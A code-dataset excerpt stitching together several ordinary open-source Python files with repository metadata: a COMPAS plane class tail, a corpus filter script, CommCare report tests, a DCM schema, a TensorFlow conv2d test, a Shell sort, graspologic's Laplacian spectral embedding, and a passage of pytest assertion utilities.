                geometry = Rhino.Geometry.Plane(point, xaxis, yaxis)
            else:
                # A compas Plane or a plain (point, normal) pair: both are
                # indexed identically, so one branch covers both (removes
                # the verbatim duplication in the original if/elif/else).
                point = Rhino.Geometry.Point3d(geometry[0][0], geometry[0][1], geometry[0][2])
                normal = Rhino.Geometry.Vector3d(geometry[1][0], geometry[1][1], geometry[1][2])
                geometry = Rhino.Geometry.Plane(point, normal)
        # Renamed local from the copy-pasted `line` to `plane`.
        plane = cls()
        plane.geometry = geometry
        return plane

    @classmethod
    def from_selection(cls):
        # Interactive selection is not implemented for planes.
        raise NotImplementedError

    def to_compas(self):
        """Convert to a COMPAS geometry object.

        Returns
        -------
        :class:`compas.geometry.Frame`
            A COMPAS frame object.
        """
        return Frame(self.point, self.xaxis, self.yaxis)
# ==============================================================================
# Main
# ==============================================================================
if __name__ == '__main__':
pass
| 31.472727
| 145
| 0.591854
|
4a0a4910f6f84268ddb16877548ff314a9a81d09
| 560
|
py
|
Python
|
developement_code/get_short_train_data.py
|
darongliu/Input_Method
|
28055937fc777cbba8cbc4c87ba5a2670da7d4e2
|
[
"MIT"
] | 1
|
2018-07-03T07:42:42.000Z
|
2018-07-03T07:42:42.000Z
|
developement_code/get_short_train_data.py
|
darongliu/Input_Method
|
28055937fc777cbba8cbc4c87ba5a2670da7d4e2
|
[
"MIT"
] | null | null | null |
developement_code/get_short_train_data.py
|
darongliu/Input_Method
|
28055937fc777cbba8cbc4c87ba5a2670da7d4e2
|
[
"MIT"
] | null | null | null |
import os

# Filter the PTT training corpus down to "short" sentences (< 20 tokens),
# writing them to a sibling *_short corpus file.
data_root = "../data"
origin_file = os.path.join(data_root, "all_chinese_char_seperate_train.ptt.corpus.20140906.txt")
save_file = os.path.join(data_root, "all_chinese_char_seperate_train_short.ptt.corpus.20140906.txt")

with open(origin_file, 'r') as f_read, open(save_file, 'w') as f_save:
    # Stream line-by-line instead of readlines() so a large corpus is not
    # loaded into memory all at once.
    for line in f_read:
        words = line.split()
        if len(words) < 20:
            # Preserve the original output format exactly:
            # every token followed by a single space, then a newline.
            f_save.write("".join(word + " " for word in words))
            f_save.write("\n")
| 32.941176
| 101
| 0.633929
|
4a0a493d3448f996eea0873ddc011de1d911fc04
| 5,511
|
py
|
Python
|
corehq/apps/reports/tests/test_sql_reports.py
|
satyaakam/commcare-hq
|
233f255ff20ab3a16013e9fdfdb9c1dcf632e415
|
[
"BSD-3-Clause"
] | null | null | null |
corehq/apps/reports/tests/test_sql_reports.py
|
satyaakam/commcare-hq
|
233f255ff20ab3a16013e9fdfdb9c1dcf632e415
|
[
"BSD-3-Clause"
] | 1
|
2021-06-02T04:45:16.000Z
|
2021-06-02T04:45:16.000Z
|
corehq/apps/reports/tests/test_sql_reports.py
|
satyaakam/commcare-hq
|
233f255ff20ab3a16013e9fdfdb9c1dcf632e415
|
[
"BSD-3-Clause"
] | null | null | null |
from datetime import datetime, time
from django import test as unittest
from django.test.client import RequestFactory
from dimagi.utils.dates import DateSpan
from corehq.apps.domain.shortcuts import create_domain
from corehq.apps.users.models import WebUser
from corehq.sql_db.connections import Session
from corehq.util.dates import iso_string_to_date
from corehq.util.test_utils import softer_assert
from .sql_fixture import load_data
from .sql_reports import RegionTestReport, UserTestReport, test_report
DOMAIN = "test"
class BaseReportTest(unittest.TestCase):
    """Shared fixture for SQL report tests: loads fixture data, creates a
    test domain and admin user, and provides helpers to render a report
    into row data."""

    @classmethod
    def setUpClass(cls):
        super(BaseReportTest, cls).setUpClass()
        load_data()
        create_domain(DOMAIN)
        cls.couch_user = WebUser.create(None, "report_test", "foobar")
        cls.couch_user.add_domain_membership(DOMAIN, is_admin=True)
        cls.couch_user.save()
        cls.factory = RequestFactory()

    @classmethod
    def tearDownClass(cls):
        cls.couch_user.delete()
        Session.remove()
        super(BaseReportTest, cls).tearDownClass()

    def _get_report_data(self, report, startdate, enddate):
        """Render *report* over the date range and return parallel
        (html_data, sort_data) row lists from its 'aaData' payload."""
        req = self._get_request(startdate, enddate)
        rep = report(req, in_testing=True)
        json = rep.json_dict['aaData']
        html_data, sort_data = [], []
        for row in json:
            html_row, sort_row = [], []
            for val in row:
                # Formatted cells arrive as {"html": ..., "sort_key": ...};
                # plain cells are used verbatim for both views.
                if isinstance(val, dict):
                    html_row.append(val["html"])
                    sort_row.append(val["sort_key"])
                else:
                    html_row.append(val)
                    sort_row.append(val)
            html_data.append(html_row)
            sort_data.append(sort_row)
        return html_data, sort_data

    def _get_request(self, startdate, enddate):
        # Minimal GET request carrying the test user and the datespan.
        request = self.factory.get('/')
        request.couch_user = self.couch_user
        request.datespan = DateSpan(self.date(startdate), self.date(enddate))
        return request

    def date(self, d):
        """Parse an ISO date string into a datetime at midnight."""
        return datetime.combine(iso_string_to_date(d), time())
class SimpleReportTest(BaseReportTest):
    """End-to-end checks of test_report over the SQL fixture data,
    covering grouping, filtering, extra keys, and cell formatting."""

    @softer_assert("to add back post https://github.com/dimagi/sql-agg/pull/56")
    def test_no_group_no_filter(self):
        html_data, sort_data = self._get_report_data(test_report(UserTestReport), "2013-01-01", "2013-02-01")
        # Ungrouped report aggregates everything into a single row.
        self.assertEqual(len(sort_data), 1)
        self.assertEqual(sort_data[0], [2, 2, 66])

    @softer_assert("to add back post https://github.com/dimagi/sql-agg/pull/56")
    def test_no_group_with_filter(self):
        filters = ["date > :startdate"]
        report = test_report(UserTestReport, filters=filters)
        html_data, sort_data = self._get_report_data(report, "2013-01-01", "2013-02-01")
        self.assertEqual(len(sort_data), 1)
        self.assertEqual(sort_data[0], [1, 1, 66])

    def test_with_group_no_filter(self):
        keys = [["user1"], ["user2"]]  # specify keys to guarantee ordering
        report = test_report(UserTestReport, keys=keys, group_by=['user'])
        html_data, sort_data = self._get_report_data(report, "2013-01-01", "2013-02-01")
        self.assertEqual(len(sort_data), 2)
        self.assertEqual(sort_data[0], ['Joe', 1, 1, 100])
        self.assertEqual(sort_data[1], ['Bob', 1, 1, 50])

    def test_with_group_with_filter(self):
        keys = [["user1"], ["user2"]]  # specify keys to guarantee ordering
        filters = ["date > :startdate"]
        report = test_report(UserTestReport, keys=keys, filters=filters, group_by=['user'])
        html_data, sort_data = self._get_report_data(report, "2013-01-01", "2013-02-01")
        self.assertEqual(len(sort_data), 2)
        self.assertEqual(sort_data[0], ['Joe', 0, 1, 100])
        self.assertEqual(sort_data[1], ['Bob', 1, 0, 50])

    def test_extra_keys(self):
        # A key with no backing data still yields a row, padded with '--'.
        keys = [["user1"], ["user2"], ["user3"]]
        report = test_report(UserTestReport, keys=keys, group_by=['user'])
        html_data, sort_data = self._get_report_data(report, "2013-01-01", "2013-02-01")
        self.assertEqual(len(sort_data), 3)
        self.assertEqual(sort_data[0], ['Joe', 1, 1, 100])
        self.assertEqual(sort_data[1], ['Bob', 1, 1, 50])
        self.assertEqual(sort_data[2], ['Gill', '--', '--', '--'])

    def test_formatting(self):
        # HTML cells carry formatted percent strings; sort keys stay numeric.
        keys = [["user1"], ["user2"]]
        report = test_report(UserTestReport, keys=keys, group_by=['user'])
        html_data, sort_data = self._get_report_data(report, "2013-01-01", "2013-02-01")
        self.assertEqual(len(sort_data), 2)
        self.assertEqual(html_data[0], ['Joe', 1, 1, "100%"])
        self.assertEqual(html_data[1], ['Bob', 1, 1, "50%"])
        self.assertEqual(sort_data[0], ['Joe', 1, 1, 100])
        self.assertEqual(sort_data[1], ['Bob', 1, 1, 50])

    def test_multi_level_grouping(self):
        keys = [
            ["region1", "region1_a"], ["region1", "region1_b"],
            ["region2", "region2_a"], ["region2", "region2_b"]
        ]
        report = test_report(RegionTestReport, keys=keys, group_by=["region", "sub_region"])
        html_data, sort_data = self._get_report_data(report, "2013-01-01", "2013-02-01")
        self.assertEqual(len(sort_data), 4)
        self.assertEqual(sort_data[0], ['Cape Town', 'Ronderbosch', 2, 1])
        self.assertEqual(sort_data[1], ['Cape Town', 'Newlands', 0, 1])
        self.assertEqual(sort_data[2], ['Durban', 'Glenwood', 1, 2])
        self.assertEqual(sort_data[3], ['Durban', 'Morningside', 1, 0])
| 41.43609
| 109
| 0.636727
|
4a0a493e80a75f82d4597ff9c4be7afbfc45c000
| 2,218
|
py
|
Python
|
starthinker/task/dcm_api/schema/floodlightActivityPublisherDynamicTag.py
|
viohman/starthinker
|
20bd2d7fd1e541eb8a2c9b7159941f667e22e38e
|
[
"Apache-2.0"
] | null | null | null |
starthinker/task/dcm_api/schema/floodlightActivityPublisherDynamicTag.py
|
viohman/starthinker
|
20bd2d7fd1e541eb8a2c9b7159941f667e22e38e
|
[
"Apache-2.0"
] | 6
|
2021-03-19T12:00:18.000Z
|
2022-02-10T09:43:42.000Z
|
starthinker/task/dcm_api/schema/floodlightActivityPublisherDynamicTag.py
|
viohman/starthinker
|
20bd2d7fd1e541eb8a2c9b7159941f667e22e38e
|
[
"Apache-2.0"
] | null | null | null |
###########################################################################
#
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
# Schema for the DCM "floodlightActivityPublisherDynamicTag" API resource.
# NOTE(review): the nested lists appear to group the fields of embedded
# record types (the dynamic tag itself, and a dimension-value matcher) --
# confirm how the downstream schema loader interprets plain lists before
# relying on this reading.
floodlightActivityPublisherDynamicTag_Schema = [
    {
        "name": "clickThrough",
        "type": "BOOLEAN",
        "mode": "NULLABLE"
    },
    {
        "description": "",
        "name": "directorySiteId",
        "type": "INT64",
        "mode": "NULLABLE"
    },
    # Embedded record: id / name / tag fields.
    [
        {
            "description": "",
            "name": "id",
            "type": "INT64",
            "mode": "NULLABLE"
        },
        {
            "description": "",
            "name": "name",
            "type": "STRING",
            "mode": "NULLABLE"
        },
        {
            "description": "",
            "name": "tag",
            "type": "STRING",
            "mode": "NULLABLE"
        }
    ],
    {
        "description": "",
        "name": "siteId",
        "type": "INT64",
        "mode": "NULLABLE"
    },
    # Embedded record: dimension-value fields (dimensionName, matchType, ...).
    [
        {
            "description": "",
            "name": "dimensionName",
            "type": "STRING",
            "mode": "NULLABLE"
        },
        {
            "description": "",
            "name": "etag",
            "type": "STRING",
            "mode": "NULLABLE"
        },
        {
            "description": "",
            "name": "id",
            "type": "STRING",
            "mode": "NULLABLE"
        },
        {
            "description": "",
            "name": "kind",
            "type": "STRING",
            "mode": "NULLABLE"
        },
        {
            "description": "BEGINS_WITH, CONTAINS, EXACT, WILDCARD_EXPRESSION",
            "name": "matchType",
            "type": "STRING",
            "mode": "NULLABLE"
        },
        {
            "description": "",
            "name": "value",
            "type": "STRING",
            "mode": "NULLABLE"
        }
    ],
    {
        "name": "viewThrough",
        "type": "BOOLEAN",
        "mode": "NULLABLE"
    }
]
| 21.960396
| 75
| 0.48422
|
4a0a4973c5651f17e7d54c318ede70e5c832dbe6
| 5,198
|
py
|
Python
|
test/test_conv2d.py
|
wavecomp/waveext
|
ef7da7f751d565c160f4e6fbaa71b6ef256702cd
|
[
"Apache-2.0"
] | 3
|
2018-07-27T13:14:49.000Z
|
2019-05-13T21:25:16.000Z
|
test/test_conv2d.py
|
kshiring/waveext
|
ef7da7f751d565c160f4e6fbaa71b6ef256702cd
|
[
"Apache-2.0"
] | 1
|
2018-07-20T18:59:58.000Z
|
2018-07-20T18:59:58.000Z
|
test/test_conv2d.py
|
kshiring/waveext
|
ef7da7f751d565c160f4e6fbaa71b6ef256702cd
|
[
"Apache-2.0"
] | 2
|
2018-07-20T18:50:26.000Z
|
2019-04-02T11:45:18.000Z
|
#!/usr/bin/env python3
# test_conv2d.py
#
# Copyright (c) 2010-2018 Wave Computing, Inc. and its applicable licensors.
# All rights reserved; provided, that any files identified as open source shall
# be governed by the specific open source license(s) applicable to such files.
#
# For any files associated with distributions under the Apache 2.0 license,
# full attribution to The Apache Software Foundation is given via the license
# below.
#
# PURPOSE
# Unit test for FP Conv2D
#
# Author : Ken Shiring
# Created On : 02/26/2018
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import tensorflow as tf
import progressbar as pb
import waveflow
def compare_tensor(z1, z2, msg):
    '''Compare two arrays for shape equality and element-wise near-equality.

    Prints diagnostic details on mismatch instead of raising, so callers
    can dump extra context before asserting.

    :param z1: first array (numpy ndarray).
    :param z2: second array (numpy ndarray).
    :param msg: message printed when the comparison fails.
    :return: True if shapes match and all elements are close, else False.
    '''
    if z1.shape != z2.shape:
        print(msg)
        print("z1 shape: %s, z2 shape: %s" % (str(z1.shape), str(z2.shape)))
        return False
    # NOTE: this is an *absolute* tolerance. The original code named it
    # ``rtol`` but passed it as ``atol``, which was misleading; renamed.
    atol = 1e-4
    if not np.allclose(z1, z2, atol=atol):
        print("\n\n")
        d = ~np.isclose(z1, z2, atol=atol)
        print("z1 mismatch: %s" % (z1[d]))
        print("z2 mismatch: %s" % (z2[d]))
        print("at: %s" % (str(np.where(d))))
        print("Failure: %s" % (msg))
        return False
    return True
def conv2d_test(config, t_init, i, p, activations, c2d_wts, stride, padding):
    '''Run one wave_conv2d vs. stock tf.nn.conv2d comparison and assert equality.'''
    strides = [1, stride, stride, 1]
    with tf.Session('', config=config) as sess:
        t_init.run()
        # Custom Wave kernel under test.
        wave_out = waveflow.wavecomp_ops_module.wave_conv2d(
            activations, c2d_wts, strides=strides, padding=padding)
        # Reference implementation from stock TensorFlow (NHWC only).
        ref_out = tf.nn.conv2d(activations, c2d_wts,
            strides=strides, padding=padding, data_format='NHWC', use_cudnn_on_gpu=False)
        z, z2, act_val, wts_val = sess.run([wave_out, ref_out, activations, c2d_wts])

        assert_str = "Failure on i: %d, mode: SAME, params: %s" % (i, str(p))
        if not compare_tensor(z, z2, assert_str):
            print("activations: %s" % (act_val))
            print("c2d_wts: %s" % (wts_val))
            print("\n\n")
            assert False
def test_conv2d():
    '''Run tests on the Wave custom conv2d operator.'''
    tf.reset_default_graph()

    # Turn off graph-rewriting optimizations so the custom op is compared
    # against an un-fused reference graph.
    opt = tf.OptimizerOptions(opt_level=tf.OptimizerOptions.L0)
    config = tf.ConfigProto(graph_options=tf.GraphOptions(optimizer_options=opt))

    iterations = 10
    widgets = ["conv2d tests: ", pb.Percentage(), ' ', pb.Bar(), ' ', pb.ETA()]
    pbar = pb.ProgressBar(widgets=widgets, maxval=iterations)
    pbar.start()

    # Interesting kernel variants to cycle through.
    kernel_params = [
        {'t_n': 100, 't_ci': 1,  't_co': 32,  't_h': 28,  't_w': 28,  'w_k': 5},
        {'t_n': 4,   't_ci': 32, 't_co': 32,  't_h': 15,  't_w': 15,  'w_k': 3},
        {'t_n': 1,   't_ci': 4,  't_co': 64,  't_h': 16,  't_w': 16,  'w_k': 3},
        {'t_n': 128, 't_ci': 64, 't_co': 128, 't_h': 7,   't_w': 7,   'w_k': 5},
        {'t_n': 4,   't_ci': 8,  't_co': 4,   't_h': 224, 't_w': 224, 'w_k': 7},
        {'t_n': 100, 't_ci': 1,  't_co': 32,  't_h': 28,  't_w': 28,  'w_k': 1},
        {'t_n': 1,   't_ci': 1,  't_co': 2,   't_h': 4,   't_w': 4,   'w_k': 1}
    ]

    for i in range(iterations):
        pbar.update(i)
        tf.reset_default_graph()
        params = kernel_params[i % len(kernel_params)]

        # Activations: N H W C.
        activations = tf.get_variable(
            "a", [params['t_n'], params['t_h'], params['t_w'], params['t_ci']],
            dtype=tf.float32, initializer=tf.truncated_normal_initializer(stddev=0.1))
        # Weights: K K Ci Co.
        c2d_wts = tf.get_variable(
            "b", [params['w_k'], params['w_k'], params['t_ci'], params['t_co']],
            dtype=tf.float32, initializer=tf.truncated_normal_initializer(stddev=0.1))
        t_init = tf.global_variables_initializer()

        # SAME and VALID at stride 1, VALID at stride 2.
        conv2d_test(config, t_init, i, params, activations, c2d_wts, stride=1, padding='SAME')
        conv2d_test(config, t_init, i, params, activations, c2d_wts, stride=1, padding='VALID')
        conv2d_test(config, t_init, i, params, activations, c2d_wts, stride=2, padding='VALID')

    pbar.finish()
    return True
if __name__ == "__main__":
test_conv2d()
| 34.885906
| 141
| 0.595614
|
4a0a49c64b8effeb3ed7381ae68cdfe219b4001c
| 364
|
py
|
Python
|
10.ShellSort.py
|
sarincr/Data-Structure-Algorithms-In-Python
|
80443ddb67f889b1d6c41d46da40d651441b911e
|
[
"MIT"
] | null | null | null |
10.ShellSort.py
|
sarincr/Data-Structure-Algorithms-In-Python
|
80443ddb67f889b1d6c41d46da40d651441b911e
|
[
"MIT"
] | null | null | null |
10.ShellSort.py
|
sarincr/Data-Structure-Algorithms-In-Python
|
80443ddb67f889b1d6c41d46da40d651441b911e
|
[
"MIT"
] | 1
|
2021-07-06T19:14:11.000Z
|
2021-07-06T19:14:11.000Z
|
def ShellSort(lst, n):
    """Sort the first n elements of lst in place using Shell sort.

    Gap sequence: n//2, halved each pass until it reaches zero.
    """
    gap = n // 2
    while gap:
        for idx in range(gap, n):
            current = lst[idx]
            pos = idx
            # Shift gap-sorted elements right until current's slot is found.
            while pos >= gap and lst[pos - gap] > current:
                lst[pos] = lst[pos - gap]
                pos -= gap
            lst[pos] = current
        gap //= 2
# Demo: sort a fixed sample list and print it before and after.
lst = [4, 9, 6, 8, 5, 2, 10, 7, 1, 3]
n = len(lst)
print('Array before Sorting:')
print(lst)
ShellSort(lst, n)
print('Array after Sorting:')
print(lst)
| 18.2
| 38
| 0.483516
|
4a0a4c49d69bf30bc078b9962598132810ff2273
| 7,502
|
py
|
Python
|
graspologic/embed/lse.py
|
j1c/graspologic
|
ff34382d1ffa0b7ea5f0e005525b7364f977e86f
|
[
"MIT"
] | 110
|
2018-09-18T15:33:38.000Z
|
2020-09-12T20:12:09.000Z
|
graspologic/embed/lse.py
|
j1c/graspologic
|
ff34382d1ffa0b7ea5f0e005525b7364f977e86f
|
[
"MIT"
] | 431
|
2018-09-18T21:03:12.000Z
|
2020-09-15T05:42:04.000Z
|
graspologic/embed/lse.py
|
j1c/graspologic
|
ff34382d1ffa0b7ea5f0e005525b7364f977e86f
|
[
"MIT"
] | 47
|
2018-09-28T11:34:45.000Z
|
2020-09-08T11:34:30.000Z
|
# Copyright (c) Microsoft Corporation and contributors.
# Licensed under the MIT License.
from typing import Any, Optional, Union
import networkx as nx
import numpy as np
from ..types import GraphRepresentation
from ..utils import LaplacianFormType, to_laplacian
from .base import BaseSpectralEmbed, SvdAlgorithmType
class LaplacianSpectralEmbed(BaseSpectralEmbed):
    r"""
    Class for computing the laplacian spectral embedding of a graph.
    The laplacian spectral embedding (LSE) is a k-dimensional Euclidean representation
    of the graph based on its Laplacian matrix. It relies on an SVD to reduce
    the dimensionality to the specified ``n_components``, or if ``n_components`` is
    unspecified, can find a number of dimensions automatically.
    Parameters
    ----------
    form : {'DAD' (default), 'I-DAD', 'R-DAD'}, optional
        Specifies the type of Laplacian normalization to use. See
        :func:`~graspologic.utils.to_laplacian` for more details regarding form.
    n_components : int or None, default = None
        Desired dimensionality of output data. If "full",
        ``n_components`` must be ``<= min(X.shape)``. Otherwise, ``n_components`` must be
        ``< min(X.shape)``. If None, then optimal dimensions will be chosen by
        :func:`~graspologic.embed.select_dimension` using ``n_elbows`` argument.
    n_elbows : int, optional, default: 2
        If ``n_components`` is None, then compute the optimal embedding dimension using
        :func:`~graspologic.embed.select_dimension`. Otherwise, ignored.
    algorithm : {'randomized' (default), 'full', 'truncated'}, optional
        SVD solver to use:
        - 'randomized'
            Computes randomized svd using
            :func:`sklearn.utils.extmath.randomized_svd`
        - 'full'
            Computes full svd using :func:`scipy.linalg.svd`
        - 'truncated'
            Computes truncated svd using :func:`scipy.sparse.linalg.svds`
    n_iter : int, optional (default = 5)
        Number of iterations for randomized SVD solver. Not used by 'full' or
        'truncated'. The default is larger than the default in randomized_svd
        to handle sparse matrices that may have large slowly decaying spectrum.
    check_lcc : bool , optional (default = True)
        Whether to check if input graph is connected. May result in non-optimal
        results if the graph is unconnected. If True and input is unconnected,
        a UserWarning is thrown. Not checking for connectedness may result in
        faster computation.
    regularizer: int, float or None, optional (default=None)
        Constant to be added to the diagonal of degree matrix. If None, average
        node degree is added. If int or float, must be >= 0. Only used when
        ``form`` is 'R-DAD'.
    concat : bool, optional (default False)
        If graph is directed, whether to concatenate left and right (out and in) latent
        positions along axis 1.
    Attributes
    ----------
    n_features_in_: int
        Number of features passed to the
        :func:`~graspologic.embed.LaplacianSpectralEmbed.fit` method.
    latent_left_ : array, shape (n_samples, n_components)
        Estimated left latent positions of the graph.
    latent_right_ : array, shape (n_samples, n_components), or None
        Only computed when the graph is directed, or adjacency matrix is asymmetric.
        Estimated right latent positions of the graph. Otherwise, None.
    singular_values_ : array, shape (n_components)
        Singular values associated with the latent position matrices.
    svd_seed : int or None (default ``None``)
        Only applicable for ``algorithm="randomized"``; allows you to seed the
        randomized svd solver for deterministic, albeit pseudo-randomized behavior.
    See Also
    --------
    graspologic.embed.select_svd
    graspologic.embed.select_dimension
    graspologic.utils.to_laplacian
    Notes
    -----
    The singular value decomposition:
    .. math:: A = U \Sigma V^T
    is used to find an orthonormal basis for a matrix, which in our case is the
    Laplacian matrix of the graph. These basis vectors (in the matrices U or V) are
    ordered according to the amount of variance they explain in the original matrix.
    By selecting a subset of these basis vectors (through our choice of dimensionality
    reduction) we can find a lower dimensional space in which to represent the graph.
    References
    ----------
    .. [1] Sussman, D.L., Tang, M., Fishkind, D.E., Priebe, C.E. "A
       Consistent Adjacency Spectral Embedding for Stochastic Blockmodel Graphs,"
       Journal of the American Statistical Association, Vol. 107(499), 2012.
    .. [2] Von Luxburg, Ulrike. "A tutorial on spectral clustering," Statistics
       and computing, Vol. 17(4), pp. 395-416, 2007.
    .. [3] Rohe, Karl, Sourav Chatterjee, and Bin Yu. "Spectral clustering and
       the high-dimensional stochastic blockmodel," The Annals of Statistics,
       Vol. 39(4), pp. 1878-1915, 2011.
    """
    def __init__(
        self,
        form: LaplacianFormType = "DAD",
        n_components: Optional[int] = None,
        n_elbows: Optional[int] = 2,
        algorithm: SvdAlgorithmType = "randomized",
        n_iter: int = 5,
        check_lcc: bool = True,
        regularizer: Optional[float] = None,
        concat: bool = False,
        svd_seed: Optional[int] = None,
    ):
        # Dimensionality / SVD options are handled entirely by the base class;
        # only ``form`` and ``regularizer`` are Laplacian-specific.
        super().__init__(
            n_components=n_components,
            n_elbows=n_elbows,
            algorithm=algorithm,
            n_iter=n_iter,
            check_lcc=check_lcc,
            concat=concat,
            svd_seed=svd_seed,
        )
        self.form = form
        self.regularizer = regularizer
    def fit(
        self,
        graph: GraphRepresentation,
        y: Optional[Any] = None,
        *args: Any,
        **kwargs: Any
    ) -> "LaplacianSpectralEmbed":
        """
        Fit LSE model to input graph
        By default, uses the Laplacian normalization of the form:
        .. math:: L = D^{-1/2} A D^{-1/2}
        Parameters
        ----------
        graph : array-like, scipy.sparse.csr_matrix, or networkx.Graph
            Input graph to embed. see graspologic.utils.import_graph
        Returns
        -------
        self : object
            Returns an instance of self.
        """
        # NOTE(review): self._fit comes from BaseSpectralEmbed (not visible
        # here); it is expected to validate *graph* and return its adjacency
        # representation -- confirm against base class.
        A = self._fit(graph)
        # Embed the normalized Laplacian rather than the raw adjacency.
        L_norm = to_laplacian(A, form=self.form, regularizer=self.regularizer)
        self._reduce_dim(L_norm)
        self.is_fitted_ = True
        return self
    def _compute_oos_prediction(self, X, directed):  # type: ignore
        """
        Computes the out-of-sample latent position estimation.
        Parameters
        ----------
        X: np.ndarray
            Input to do oos embedding on.
        directed: bool
            Indication if graph is directed or undirected
        Returns
        -------
        out : array_like or tuple, shape
        """
        if not directed:
            if X.ndim == 1:
                # Promote a single vertex's vector to a 1-row matrix.
                X = np.expand_dims(X, axis=0)
            # Project onto the in-sample basis, then divide each row by its
            # row total -- row-wise normalization.
            # NOTE(review): _pinv_left/_pinv_right are presumably set during
            # fit by the base class; not visible here -- verify before
            # calling this pre-fit.
            return ((X @ self._pinv_left).T / np.sum(X, axis=1)).T
        elif directed:
            X_0 = X[0]
            X_1 = X[1]
            if X_0.ndim == 1:
                X_0 = np.expand_dims(X_0, axis=0)
                X_1 = np.expand_dims(X_1, axis=0)
            return ((X_1 @ self._pinv_right).T / np.sum(X_1, axis=1)).T, (
                (X_0 @ self._pinv_left).T / np.sum(X_0, axis=1)
            ).T
| 36.067308
| 89
| 0.632631
|
4a0a4e4310aa9f1758c20bdaa4b4a56c2f00d53b
| 10,761
|
py
|
Python
|
python2.7/site-packages/_pytest/assertion/util.py
|
84KaliPleXon3/sslstrip-hsts-openwrt
|
f875ded48078a3ed84bffef1e69dcbeaf2e77ae3
|
[
"MIT"
] | 1,323
|
2016-11-17T21:28:18.000Z
|
2022-03-31T17:42:37.000Z
|
python2.7/site-packages/_pytest/assertion/util.py
|
84KaliPleXon3/sslstrip-hsts-openwrt
|
f875ded48078a3ed84bffef1e69dcbeaf2e77ae3
|
[
"MIT"
] | 301
|
2017-01-02T17:49:13.000Z
|
2022-03-14T13:17:42.000Z
|
python2.7/site-packages/_pytest/assertion/util.py
|
84KaliPleXon3/sslstrip-hsts-openwrt
|
f875ded48078a3ed84bffef1e69dcbeaf2e77ae3
|
[
"MIT"
] | 131
|
2017-02-09T08:05:03.000Z
|
2022-03-15T06:44:34.000Z
|
"""Utilities for assertion debugging"""
import pprint
import _pytest._code
import py
try:
    from collections import Sequence
except ImportError:
    # Pythons without collections.Sequence: fall back to treating only
    # real lists as "sequences" in the comparison helpers below.
    Sequence = list
BuiltinAssertionError = py.builtin.builtins.AssertionError
u = py.builtin._totext  # py2/py3-compatible unicode text constructor
# The _reprcompare attribute on the util module is used by the new assertion
# interpretation code and assertion rewriter to detect this plugin was
# loaded and in turn call the hooks defined here as part of the
# DebugInterpreter.
_reprcompare = None
# the re-encoding is needed for python2 repr
# with non-ascii characters (see issue 877 and 1379)
def ecu(s):
    """Best-effort conversion of *s* to unicode text.

    Byte strings are decoded as UTF-8 with undecodable bytes replaced;
    anything ``u()`` rejects with TypeError (already-unicode text, or
    non-string objects) is returned unchanged.
    """
    try:
        return u(s, 'utf-8', 'replace')
    except TypeError:
        return s
def format_explanation(explanation):
    """Return *explanation* formatted for display.

    All embedded newlines are escaped except the three markers
    '\\n{', '\\n}' and '\\n~': the first two delimit nested
    explanations (see function and attribute explanations) and the
    last lets one explanation span several lines, e.g. for diffs.
    """
    normalized = ecu(explanation)
    return u('\n').join(_format_lines(_split_explanation(normalized)))
def _split_explanation(explanation):
    """Split *explanation* on the '\\n{', '\\n}' and '\\n~' markers.

    Any other newline stays escaped as a literal '\\n' inside the line
    it belongs to.
    """
    pieces = (explanation or u('')).split('\n')
    lines = [pieces[0]]
    for piece in pieces[1:]:
        if piece and piece[0] in ('{', '}', '~', '>'):
            lines.append(piece)
        else:
            lines[-1] += '\\n' + piece
    return lines
def _format_lines(lines):
    """Format the individual lines

    This will replace the '{', '}' and '~' characters of our mini
    formatting language with the proper 'where ...', 'and ...' and ' +
    ...' text, taking care of indentation along the way.

    Return a list of formatted lines.
    """
    result = lines[:1]
    stack = [0]  # index into result of the opener line for each open '{'
    stackcnt = [0]  # how many nested explanations were seen at each level
    for line in lines[1:]:
        if line.startswith('{'):
            # First nested explanation at a level reads 'where', later 'and'.
            if stackcnt[-1]:
                s = u('and ')
            else:
                s = u('where ')
            stack.append(len(result))
            stackcnt[-1] += 1
            stackcnt.append(0)
            result.append(u(' +') + u(' ')*(len(stack)-1) + s + line[1:])
        elif line.startswith('}'):
            # Close the nesting level and splice this text onto its opener.
            stack.pop()
            stackcnt.pop()
            result[stack[-1]] += line[1:]
        else:
            assert line[0] in ['~', '>']
            stack[-1] += 1
            indent = len(stack) if line.startswith('~') else len(stack) - 1
            result.append(u(' ')*indent + line[1:])
    assert len(stack) == 1
    return result
# Provide basestring in python3
try:
    basestring = basestring
except NameError:
    # Python 3: there is no basestring; all text is str.
    basestring = str
def assertrepr_compare(config, op, left, right):
    """Return specialised explanations for some operators/operands"""
    width = 80 - 15 - len(op) - 2 # 15 chars indentation, 1 space around op
    left_repr = py.io.saferepr(left, maxsize=int(width//2))
    right_repr = py.io.saferepr(right, maxsize=width-len(left_repr))
    summary = u('%s %s %s') % (ecu(left_repr), op, ecu(right_repr))
    # Type predicates that choose which specialised comparison to run below.
    issequence = lambda x: (isinstance(x, (list, tuple, Sequence)) and
                            not isinstance(x, basestring))
    istext = lambda x: isinstance(x, basestring)
    isdict = lambda x: isinstance(x, dict)
    isset = lambda x: isinstance(x, (set, frozenset))
    def isiterable(obj):
        # Anything iterable except text counts as an iterable container here.
        try:
            iter(obj)
            return not istext(obj)
        except TypeError:
            return False
    verbose = config.getoption('verbose')
    explanation = None
    try:
        if op == '==':
            if istext(left) and istext(right):
                explanation = _diff_text(left, right, verbose)
            else:
                if issequence(left) and issequence(right):
                    explanation = _compare_eq_sequence(left, right, verbose)
                elif isset(left) and isset(right):
                    explanation = _compare_eq_set(left, right, verbose)
                elif isdict(left) and isdict(right):
                    explanation = _compare_eq_dict(left, right, verbose)
                # For any iterable pair, additionally append the full diff.
                if isiterable(left) and isiterable(right):
                    expl = _compare_eq_iterable(left, right, verbose)
                    if explanation is not None:
                        explanation.extend(expl)
